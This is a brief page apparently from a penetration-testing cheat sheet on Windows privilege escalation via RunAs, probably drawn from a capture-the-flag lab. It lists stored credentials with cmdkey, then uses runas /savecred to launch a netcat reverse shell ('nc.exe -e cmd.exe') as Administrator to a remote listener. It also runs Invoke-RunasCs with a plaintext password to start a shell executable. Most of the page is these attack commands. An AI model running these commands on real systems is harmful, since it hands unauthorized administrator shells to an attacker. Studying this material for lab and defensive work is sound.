RunAs

Overview

The RunAs command can be thought of as the sudo command in Linux. It allows you to run a command as someone else, aka the Administrator

Escalation via RunAs

Check for stored credentials

cmdkey /list

Execute a command as Administrator

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Users\security\nc.exe -e cmd.exe 10.10.14.10 1339"

Command Layout

  • C:\Windows\System32\runas.exe use runas.exe

  • /user:ACCESS\Administrator use user Administrator

  • /savescred use the saved credentials

  • "C:\Windows\System32\nc.exe to run nc.exe as Administrator

  • 10.10.14.10 1339 and connect back to hackerman

LogoRunasCs/Invoke-RunasCs.ps1 at master · antonioCoco/RunasCsGitHub
Import-module .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 'C:\progrmadata\shell.exe'
PreviousStored Passwords and Port ForwardingNextUser Switching

Last updated